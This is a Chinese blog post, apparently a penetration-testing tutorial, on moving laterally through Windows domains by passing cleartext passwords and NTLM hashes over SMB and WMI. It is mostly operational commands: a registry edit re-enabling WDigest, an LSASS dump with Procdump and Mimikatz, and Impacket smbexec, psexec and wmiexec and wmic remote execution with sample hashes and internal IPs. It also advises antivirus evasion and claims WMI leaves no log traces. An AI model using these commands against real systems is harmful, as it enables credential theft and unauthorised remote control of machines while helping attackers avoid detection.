首页 > 其他分享 >内网渗透-smb&wmi明文&hash传递

内网渗透-smb&wmi明文&hash传递

时间:2023-01-06 21:12:13浏览次数:48  
标签:administrator hash wmiexec 192.168 明文 wmi smbexec smb

首先我们要知道,在windows2012以上版本默认会关闭wdigest,那么攻击者就无法从内存中获取明文密码了

windows2012以下的版本如果安装了KB2871997补丁,那么同样也会导致无法从内存中获取明文密码

windows系统LM Hash以及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在winserver2003之后,认证方式均为NTLM Hash

针对以上的情况,有四种方式可以解决:

1、利用哈希传递(pth,ptk等)进行移动

2、利用其他的服务协议(smb,wmi等)进行哈希移动

3、利用注册表操作开启Wdigest Auth值进行获取

reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

4、利用工具或者第三方平台(hashcat)进行破解获取

(1)Procdump+Mimikatz 配合获取

因为Procdump是微软官方的一个程序,所以不会被杀软给识别,那么就可以使用procdump备份密码然后到本地使用minikatz进行读取

Procdump上执行:procdump -accepteula -ma lsass.exe lsass.dmp

mimikatz 上执行: sekurlsa::minidump lsass.dmp

          sekurlsa::logonPasswords full

 如果拿到了hash值,那么就可以使用hashcat去破解

(2)域横向移动SMB服务利用-psexec,smbexec(官方自带)

利用SMB服务可以通过明文或者hash传递来远程执行,条件是445服务端口开放

1)psexec的使用

1.先建立IPC回话,然后使用SMB服务

 

 

 

 

 

 2.直接使用明文连接不需要IPC连接

 

 

 

 

 

 (3)如果没有明文密码,但是拿到了密码的hash值,也可以通过pstool进行连接,但是需要使用的是impacket中的psexec,因为是第三方开发的工具,所以可能会被杀软识别,因此只能看情况去使用

 

 

 2)smbexec的使用

smbexec无需建立ipc的连接,可以使用明文或者hash的传递,但是smbexec是第三方软件同样需要先做免杀才可以,以下是一些使用方法的示例

smbexec god/administrator:[email protected]  连接god域中的administrator用户

smbexec ./administrator:admin!@#[email protected]    连接本地的administrator用户

hash方法的话需要在minikatz中找到对应用户的密码hash值的NTLM或者LM值,具体使用哪个得看操作系统的版本。

 

 

 然后在使用以下的命令

smbexec -hashes :$HASH$ ./[email protected]

smbbexec -hashes :$HASH$ domain/[email protected]

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected]

smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/[email protected]

(3)域横向移动 WMI 服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

自带WMIC  只能进行明文传递  无回显

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c ipconfig >C:\1.txt"

 

 

 

 

自带 cscript   只能进行明文传递   有回显  但是需要借助一个叫做wmiexec.vbs的文件进行操作

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

 

套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin!@#[email protected] "whoami"  本地主机账户

 

wmiexec god/administrator:[email protected] "whoami"  域账户

 

wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] "whoami"  本地主机账户

 

wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/[email protected] "whoami"  域主机账户

 

 所以综上所述:

 

标签:administrator,hash,wmiexec,192.168,明文,wmi,smbexec,smb
From: https://www.cnblogs.com/LeslieSec/p/17031480.html

相关文章

  • 理解HashMap底层数据结构
    文章目录​​`hash`​​​​常用解决哈希冲突方法​​​​链地址法​​​​开放地址法​​​​`array`​​​​链表​​​​红黑树​​​​`HashMap`​​​​参考文章​​在......
  • C# 哈希表(Hashtable)
    原文链接:http://edu.jb51.net/csharp/csharp-collection-hashtable.htmlHashtable类代表了一系列基于键的哈希代码组织起来的键/值对。它使用键来访问集合中的元素。当......
  • Java 如何重写对象的 equals 方法和 hashCode 方法
    前言:Java对象如果要比较是否相等,则需要重写equals方法,同时重写hashCode方法,而且hashCode方法里面使用质数31。接下来看看各种为什么。一、需求:对比两个对象......
  • java LinkedHashMap学习
    一、LinkedHashMap概述LinkedHashMap是HashMap的一个子类,它保留插入的顺序,如果需要输出的顺序和输入时的相同,那么就选用LinkedHashMap。LinkedHashMap是Map接口的哈希表......
  • 集合6 - HashMap
    HashMapHash--Hash算法根据key计算hash函数来存放数据、处理冲突(链地址法-红黑二叉树)=>无序存储,重复丢弃Map--键值对<key,value>中key是唯一的,作为value的索引......
  • [ABC233G] Strongest Takahashi
    ProblemStatementThereisa$N\timesN$grid,withblocksonsomesquares.Thegridisdescribedby$N$strings$S_1,S_2,\dots,S_N$,asfollows.Ifthe$j$-t......
  • redis常用命令之Hash
    redis常用命令之HashHash常用命令redis可以理解为一个全局的大字典,key就是数据的唯一标识符。对应的key不同,value也不同。redis有5个基本的数据类型。1redis={2......
  • Java【使用HashMap类实例化一个Map类型的对象】
    题目:使用HashMap类实例化一个Map类型的对象m1,键(String类型)和值(int型)分别用于存储员工的姓名和工资,存入数据如下:张三——800元;李四——1500元;王五——3000元;将张三的工......
  • 集合4 HashSet
    HashSet底层实现是数组+链表数据存放时的索引通过内部Hash算法确定--增加数据是无序的Hash算法--索引相同时根据内容是否相同决定是否丢弃,内容不相同则采用链地址......
  • 总结HashSet和TreeSet的去重
    HashSet的去重添加的对象需要重写hashCode()和equals()方法,其中hashCode()方法,应该是根据自定义类对象的成员属性值计算得来,equals()方法,应该是比较自定义类对象的成员属......